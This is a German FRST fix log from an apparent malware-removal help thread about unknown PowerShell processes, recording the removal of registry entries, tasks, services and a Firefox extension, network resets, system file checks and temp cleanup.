entfernt "HKLM\Software\Policies\Microsoft\Windows\System\\UploadUserActivities" => erfolgreich entfernt "HKLM\Software\Policies\Microsoft\Windows\System\\AllowCrossDeviceClipboard" => erfolgreich entfernt "HKU\S-1-5-21-3400922340-1585523840-3734490296-1001\Software\Microsoft\Windows\CurrentVersion\Run\\AMDNoiseSuppression" => erfolgreich entfernt "HKU\S-1-5-21-3400922340-1585523840-3734490296-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\HideSCAMeetNow" => erfolgreich entfernt "HKU\S-1-5-21-3400922340-1585523840-3734490296-1002\Software\Microsoft\Windows\CurrentVersion\Run\\MicrosoftEdgeAutoLaunch_4F3ACAD5137A03F38014355EA53C9FBD" => erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{C885AA15-1764-4293-B82A-0586ADD46B35} => erfolgreich entfernt "C:\WINDOWS\system32\GroupPolicy\Machine" Ordner verschieben: C:\WINDOWS\system32\GroupPolicy\Machine => erfolgreich verschoben C:\WINDOWS\system32\GroupPolicy\GPT.ini => erfolgreich verschoben C:\ProgramData\NTUSER.pol => erfolgreich verschoben HKLM\SOFTWARE\Policies\Microsoft\Edge => erfolgreich entfernt "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CCDFC0B8-01A3-4E74-A820-4F13F51D269E}" => erfolgreich entfernt "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CCDFC0B8-01A3-4E74-A820-4F13F51D269E}" => erfolgreich entfernt C:\WINDOWS\System32\Tasks\Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser => erfolgreich verschoben "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser" => erfolgreich entfernt "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7E359839-10FF-4083-92B7-07B6F17CF925}" => erfolgreich entfernt "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7E359839-10FF-4083-92B7-07B6F17CF925}" => erfolgreich entfernt C:\WINDOWS\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Reboot_AC => erfolgreich verschoben "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator\Reboot_AC" => erfolgreich entfernt "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{05FACDF0-6FE2-48B0-BCDE-87CD432CEA4E}" => erfolgreich entfernt "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{05FACDF0-6FE2-48B0-BCDE-87CD432CEA4E}" => erfolgreich entfernt C:\WINDOWS\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Reboot_Battery => erfolgreich verschoben "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator\Reboot_Battery" => erfolgreich entfernt "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E0F10DCF-44AD-40E8-9370-FB5DA59F93FB}" => erfolgreich entfernt "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E0F10DCF-44AD-40E8-9370-FB5DA59F93FB}" => erfolgreich entfernt C:\WINDOWS\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => erfolgreich verschoben "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker" => erfolgreich entfernt "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{002C80C5-1CE2-4C73-8E35-D7B5AE35E00A}" => erfolgreich entfernt "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{002C80C5-1CE2-4C73-8E35-D7B5AE35E00A}" => erfolgreich entfernt C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3400922340-1585523840-3734490296-1002 => erfolgreich verschoben "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\OneDrive Standalone Update Task-S-1-5-21-3400922340-1585523840-3734490296-1002" => erfolgreich entfernt HKLM\System\CurrentControlSet\Services\HWiNFO_180 => erfolgreich entfernt HWiNFO_180 => Dienst erfolgreich entfernt HKLM\System\CurrentControlSet\Services\npcap => erfolgreich entfernt npcap => Dienst erfolgreich entfernt HKLM\System\CurrentControlSet\Services\npcap_wifi => erfolgreich entfernt npcap_wifi => Dienst erfolgreich entfernt HKLM\System\CurrentControlSet\Services\WinSetupMon => erfolgreich entfernt WinSetupMon => Dienst erfolgreich entfernt "C:\Users\ProgramData\AppData\Roaming\Mozilla\Firefox\Profiles\a70tufy1.default-release\Extensions\magnolia@12.34.xpi" => nicht gefunden "C:\Users\Default\AppData\Roaming\Mozilla\Firefox\Profiles\a70tufy1.default-release\Extensions\magnolia@12.34.xpi" => nicht gefunden C:\Users\doppo\AppData\Roaming\Mozilla\Firefox\Profiles\a70tufy1.default-release\Extensions\magnolia@12.34.xpi => erfolgreich verschoben "C:\Users\kids\AppData\Roaming\Mozilla\Firefox\Profiles\a70tufy1.default-release\Extensions\magnolia@12.34.xpi" => nicht gefunden "C:\Users\kids.DESKTOP-06IS096\AppData\Roaming\Mozilla\Firefox\Profiles\a70tufy1.default-release\Extensions\magnolia@12.34.xpi" => nicht gefunden "C:\Users\Public\AppData\Roaming\Mozilla\Firefox\Profiles\a70tufy1.default-release\Extensions\magnolia@12.34.xpi" => nicht gefunden ========= cscript /nologo %systemroot%\System32\slmgr.vbs /dlv ========= Softwarelizenzierungsdienst-Version: 10.0.22621.2428 Name: Windows(R), Professional edition Beschreibung: Windows(R) Operating System, VOLUME_MAK channel Aktivierungs-ID: 49cd895b-53b2-4dc4-a5f7-b18aa019ad37 Anwendungs-ID: 55c92734-d682-4d71-983e-d6ec3f16059f Erweiterte PID: 03612-03312-009-000000-03-1031-22621.0000-0422023 Product Key-Kanal: Volume:MAK Installations-ID: 645632343386005512764850763252056049700921713167616877413286966 Lizenz-URL verwenden: https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail URL fr die šberprfung: https://validation-v2.sls.microsoft.com/SLWGA/slwga.asmx Teil-Product Key: RM49M Lizenzstatus: Lizenziert Verbleibende Windows Rearm-Anzahl: 1001 Verbleibende SKU Rearm-Anzahl: 1001 Vertrauenswrdige Zeit: 24.10.2023 15:04:09 ========= Ende von CMD: ========= ========= netsh winsock reset ========= Der Winsock-Katalog wurde zurckgesetzt. Sie mssen den Computer neu starten, um den Vorgang abzuschlieáen. ========= Ende von CMD: ========= ========= netsh int ip reset ========= Depotweiterleitung wird zurckgesetzt... OK Depot wird zurckgesetzt... OK Steuerungsprotokoll wird zurckgesetzt... OK Echosequenzanforderung wird zurckgesetzt... OK Global wird zurckgesetzt... OK Schnittstelle wird zurckgesetzt... OK Anycastadresse wird zurckgesetzt... OK Multicastadresse wird zurckgesetzt... OK Unicastadresse wird zurckgesetzt... OK Nachbar wird zurckgesetzt... OK Pfad wird zurckgesetzt... OK Potentiell wird zurckgesetzt... OK Pr„fixrichtlinie wird zurckgesetzt... OK Proxynachbar wird zurckgesetzt... OK Route wird zurckgesetzt... OK Standordpr„fix wird zurckgesetzt... OK Unterschnittstelle wird zurckgesetzt... OK Reaktivierungsmuster wird zurckgesetzt... OK Nachbar aufl”sen wird zurckgesetzt... OK wird zurckgesetzt... OK wird zurckgesetzt... OK wird zurckgesetzt... OK wird zurckgesetzt... OK wird zurckgesetzt... Fehler Zugriff verweigert wird zurckgesetzt... OK wird zurckgesetzt... OK wird zurckgesetzt... OK wird zurckgesetzt... OK wird zurckgesetzt... OK wird zurckgesetzt... OK wird zurckgesetzt... OK wird zurckgesetzt... OK Starten Sie den Computer neu, um die Aktion abzuschlieáen. ========= Ende von CMD: ========= ========= ipconfig /release ========= Windows-IP-Konfiguration Es kann kein Vorgang auf Ethernet 2 ausgefhrt werden, solange dessen Medium nicht verbunden ist. Es kann kein Vorgang auf Bluetooth-Netzwerkverbindung ausgefhrt werden, solange dessen Medium nicht verbunden ist. ========= Ende von CMD: ========= ========= ipconfig /renew ========= Windows-IP-Konfiguration Es kann kein Vorgang auf Ethernet 2 ausgefhrt werden, solange dessen Medium nicht verbunden ist. Es kann kein Vorgang auf Bluetooth-Netzwerkverbindung ausgefhrt werden, solange dessen Medium nicht verbunden ist. ========= Ende von CMD: ========= ========= ipconfig /registerdns ========= Windows-IP-Konfiguration Die Registrierung der DNS-Ressourceneintr„ge fr alle Adapter dieses Computer wurde initialisiert. Fehler werden in der Ereignisanzeige in 15 Minuten aufgefhrt. ========= Ende von CMD: ========= ========= netsh advfirewall reset ========= OK. ========= Ende von CMD: ========= ========= netsh advfirewall set allprofiles state ON ========= OK. ========= Ende von CMD: ========= ========= netsh winhttp reset proxy ========= Aktuelle WinHTTP-Proxyeinstellungen: DirectAccess (kein Proxyserver). ========= Ende von CMD: ========= ========= Bitsadmin /Reset /Allusers ========= BITSADMIN version 3.0 BITS administration utility. (C) Copyright Microsoft Corp. {BA20ED90-16CF-45C9-A36F-1EC1EA381376} canceled. {AC6B056C-10D0-40CC-8213-5F51D7E8F868} canceled. 2 out of 2 jobs canceled. ========= Ende von CMD: ========= ========= Winmgmt /salvagerepository ========= Das WMI-Repository ist konsistent. ========= Ende von CMD: ========= ========= Winmgmt /resetrepository ========= Das WMI-Repository wurde zurckgesetzt. ========= Ende von CMD: ========= ========= winmgmt /resyncperf ========= 0 ========= Ende von CMD: ========= ========= "%WINDIR%\SYSTEM32\lodctr.exe" /R ========= Info: Die Leistungsindikatoreinstellung konnte erfolgreich aus dem Systemsicherungsspeicher neu erstellt werden. ========= Ende von CMD: ========= ========= "%WINDIR%\SysWOW64\lodctr.exe" /R ========= Info: Die Leistungsindikatoreinstellung konnte erfolgreich aus dem Systemsicherungsspeicher neu erstellt werden. ========= Ende von CMD: ========= ========= "%WINDIR%\SYSTEM32\lodctr.exe" /R ========= Info: Die Leistungsindikatoreinstellung konnte erfolgreich aus dem Systemsicherungsspeicher neu erstellt werden. ========= Ende von CMD: ========= ========= "%WINDIR%\SysWOW64\lodctr.exe" /R ========= Info: Die Leistungsindikatoreinstellung konnte erfolgreich aus dem Systemsicherungsspeicher neu erstellt werden. ========= Ende von CMD: ========= ========= sfc /scannow ========= Systemsuche wird gestartet. Dieser Vorgang kann einige Zeit dauern. Überprüfungsphase der Systemsuche wird gestartet. Überprüfung 0 % abgeschlossen. Überprüfung 1 % abgeschlossen. Überprüfung 1 % abgeschlossen. Überprüfung 2 % abgeschlossen. Überprüfung 2 % abgeschlossen. Überprüfung 3 % abgeschlossen. Überprüfung 3 % abgeschlossen. Überprüfung 4 % abgeschlossen. Überprüfung 4 % abgeschlossen. Überprüfung 5 % abgeschlossen. Überprüfung 5 % abgeschlossen. Überprüfung 6 % abgeschlossen. Überprüfung 6 % abgeschlossen. Überprüfung 7 % abgeschlossen. Überprüfung 7 % abgeschlossen. Überprüfung 8 % abgeschlossen. Überprüfung 8 % abgeschlossen. Überprüfung 9 % abgeschlossen. Überprüfung 9 % abgeschlossen. Überprüfung 10 % abgeschlossen. Überprüfung 10 % abgeschlossen. Überprüfung 11 % abgeschlossen. Überprüfung 11 % abgeschlossen. Überprüfung 12 % abgeschlossen. Überprüfung 12 % abgeschlossen. Überprüfung 13 % abgeschlossen. Überprüfung 13 % abgeschlossen. Überprüfung 14 % abgeschlossen. Überprüfung 14 % abgeschlossen. Überprüfung 15 % abgeschlossen. Überprüfung 15 % abgeschlossen. Überprüfung 16 % abgeschlossen. Überprüfung 16 % abgeschlossen. Überprüfung 17 % abgeschlossen. Überprüfung 17 % abgeschlossen. Überprüfung 18 % abgeschlossen. Überprüfung 18 % abgeschlossen. Überprüfung 19 % abgeschlossen. Überprüfung 19 % abgeschlossen. Überprüfung 20 % abgeschlossen. Überprüfung 20 % abgeschlossen. Überprüfung 21 % abgeschlossen. Überprüfung 21 % abgeschlossen. Überprüfung 22 % abgeschlossen. Überprüfung 22 % abgeschlossen. Überprüfung 23 % abgeschlossen. Überprüfung 23 % abgeschlossen. Überprüfung 24 % abgeschlossen. Überprüfung 24 % abgeschlossen. Überprüfung 25 % abgeschlossen. Überprüfung 25 % abgeschlossen. Überprüfung 26 % abgeschlossen. Überprüfung 26 % abgeschlossen. Überprüfung 27 % abgeschlossen. Überprüfung 28 % abgeschlossen. Überprüfung 28 % abgeschlossen. Überprüfung 29 % abgeschlossen. Überprüfung 29 % abgeschlossen. Überprüfung 30 % abgeschlossen. Überprüfung 30 % abgeschlossen. Überprüfung 31 % abgeschlossen. Überprüfung 31 % abgeschlossen. Überprüfung 32 % abgeschlossen. Überprüfung 32 % abgeschlossen. Überprüfung 33 % abgeschlossen. Überprüfung 33 % abgeschlossen. Überprüfung 34 % abgeschlossen. Überprüfung 34 % abgeschlossen. Überprüfung 35 % abgeschlossen. Überprüfung 35 % abgeschlossen. Überprüfung 36 % abgeschlossen. Überprüfung 36 % abgeschlossen. Überprüfung 37 % abgeschlossen. Überprüfung 37 % abgeschlossen. Überprüfung 38 % abgeschlossen. Überprüfung 38 % abgeschlossen. Überprüfung 39 % abgeschlossen. Überprüfung 39 % abgeschlossen. Überprüfung 40 % abgeschlossen. Überprüfung 40 % abgeschlossen. Überprüfung 41 % abgeschlossen. Überprüfung 41 % abgeschlossen. Überprüfung 42 % abgeschlossen. Überprüfung 42 % abgeschlossen. Überprüfung 43 % abgeschlossen. Überprüfung 43 % abgeschlossen. Überprüfung 44 % abgeschlossen. Überprüfung 44 % abgeschlossen. Überprüfung 45 % abgeschlossen. Überprüfung 45 % abgeschlossen. Überprüfung 46 % abgeschlossen. Überprüfung 46 % abgeschlossen. Überprüfung 47 % abgeschlossen. Überprüfung 47 % abgeschlossen. Überprüfung 48 % abgeschlossen. Überprüfung 48 % abgeschlossen. Überprüfung 49 % abgeschlossen. Überprüfung 49 % abgeschlossen. Überprüfung 50 % abgeschlossen. Überprüfung 50 % abgeschlossen. Überprüfung 51 % abgeschlossen. Überprüfung 51 % abgeschlossen. Überprüfung 52 % abgeschlossen. Überprüfung 52 % abgeschlossen. Überprüfung 53 % abgeschlossen. Überprüfung 53 % abgeschlossen. Überprüfung 54 % abgeschlossen. Überprüfung 55 % abgeschlossen. Überprüfung 55 % abgeschlossen. Überprüfung 56 % abgeschlossen. Überprüfung 56 % abgeschlossen. Überprüfung 57 % abgeschlossen. Überprüfung 57 % abgeschlossen. Überprüfung 58 % abgeschlossen. Überprüfung 58 % abgeschlossen. Überprüfung 59 % abgeschlossen. Überprüfung 59 % abgeschlossen. Überprüfung 60 % abgeschlossen. Überprüfung 60 % abgeschlossen. Überprüfung 61 % abgeschlossen. Überprüfung 61 % abgeschlossen. Überprüfung 62 % abgeschlossen. Überprüfung 62 % abgeschlossen. Überprüfung 63 % abgeschlossen. Überprüfung 63 % abgeschlossen. Überprüfung 64 % abgeschlossen. Überprüfung 64 % abgeschlossen. Überprüfung 65 % abgeschlossen. Überprüfung 65 % abgeschlossen. Überprüfung 66 % abgeschlossen. Überprüfung 66 % abgeschlossen. Überprüfung 67 % abgeschlossen. Überprüfung 67 % abgeschlossen. Überprüfung 68 % abgeschlossen. Überprüfung 68 % abgeschlossen. Überprüfung 69 % abgeschlossen. Überprüfung 69 % abgeschlossen. Überprüfung 70 % abgeschlossen. Überprüfung 70 % abgeschlossen. Überprüfung 71 % abgeschlossen. Überprüfung 71 % abgeschlossen. Überprüfung 72 % abgeschlossen. Überprüfung 72 % abgeschlossen. Überprüfung 73 % abgeschlossen. Überprüfung 73 % abgeschlossen. Überprüfung 74 % abgeschlossen. Überprüfung 74 % abgeschlossen. Überprüfung 75 % abgeschlossen. Überprüfung 75 % abgeschlossen. Überprüfung 76 % abgeschlossen. Überprüfung 76 % abgeschlossen. Überprüfung 77 % abgeschlossen. Überprüfung 77 % abgeschlossen. Überprüfung 78 % abgeschlossen. Überprüfung 78 % abgeschlossen. Überprüfung 79 % abgeschlossen. Überprüfung 79 % abgeschlossen. Überprüfung 80 % abgeschlossen. Überprüfung 80 % abgeschlossen. Überprüfung 81 % abgeschlossen. Überprüfung 82 % abgeschlossen. Überprüfung 82 % abgeschlossen. Überprüfung 83 % abgeschlossen. Überprüfung 83 % abgeschlossen. Überprüfung 84 % abgeschlossen. Überprüfung 84 % abgeschlossen. Überprüfung 85 % abgeschlossen. Überprüfung 85 % abgeschlossen. Überprüfung 86 % abgeschlossen. Überprüfung 86 % abgeschlossen. Überprüfung 87 % abgeschlossen. Überprüfung 87 % abgeschlossen. Überprüfung 88 % abgeschlossen. Überprüfung 88 % abgeschlossen. Überprüfung 89 % abgeschlossen. Überprüfung 89 % abgeschlossen. Überprüfung 90 % abgeschlossen. Überprüfung 90 % abgeschlossen. Überprüfung 91 % abgeschlossen. Überprüfung 91 % abgeschlossen. Überprüfung 92 % abgeschlossen. Überprüfung 92 % abgeschlossen. Überprüfung 93 % abgeschlossen. Überprüfung 93 % abgeschlossen. Überprüfung 94 % abgeschlossen. Überprüfung 94 % abgeschlossen. Überprüfung 95 % abgeschlossen. Überprüfung 95 % abgeschlossen. Überprüfung 96 % abgeschlossen. Überprüfung 96 % abgeschlossen. Überprüfung 97 % abgeschlossen. Überprüfung 97 % abgeschlossen. Überprüfung 98 % abgeschlossen. Überprüfung 98 % abgeschlossen. Überprüfung 99 % abgeschlossen. Überprüfung 99 % abgeschlossen. Überprüfung 100 % abgeschlossen. Der Windows-Ressourcenschutz hat keine Integritätsverletzungen gefunden. ========= Ende von CMD: ========= C:\Windows\System32\Drivers\etc\hosts => erfolgreich verschoben Hosts erfolgreich wiederhergestellt. ========= RemoveProxy: ========= "HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => erfolgreich entfernt "HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => erfolgreich entfernt "HKU\S-1-5-21-3400922340-1585523840-3734490296-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => erfolgreich entfernt "HKU\S-1-5-21-3400922340-1585523840-3734490296-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => erfolgreich entfernt "HKU\S-1-5-21-3400922340-1585523840-3734490296-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => erfolgreich entfernt "HKU\S-1-5-21-3400922340-1585523840-3734490296-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => erfolgreich entfernt ========= Ende von RemoveProxy: ========= =========== EmptyTemp: ========== FlushDNS => abgeschlossen BITS transfer queue => 0 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 9723144 B Java, Discord, Steam htmlcache, WinHttpAutoProxySvc/winhttp *.cache => 1246330483 B Windows/system/drivers => 10572440 B Edge => 0 B Firefox => 4197207559 B Opera => 0 B Temp, IE cache, history, cookies, recent: Default => 0 B ProgramData => 0 B Public => 0 B systemprofile => 0 B systemprofile32 => 0 B LocalService => 662290 B NetworkService => 1121226 B doppo => 2745370254 B kids.DESKTOP-06IS096 => 2784847032 B RecycleBin => 0 B EmptyTemp: => 10.2 GB temporäre Dateien entfernt. ================================ Das System musste neu gestartet werden. ==== Ende von Fixlog 15:11:37 ==== |
Themen zu drei Unbekannte Powershell Prozesse |
administrator, autorun, dateien, defender, explorer.exe, firefox, google, homepage, internet, microsoft, mozilla, ordner, pdf, prozess, prozesse, realtek, registry, scan, services.exe, suche, svchost.exe, system, temp, treiber, windows |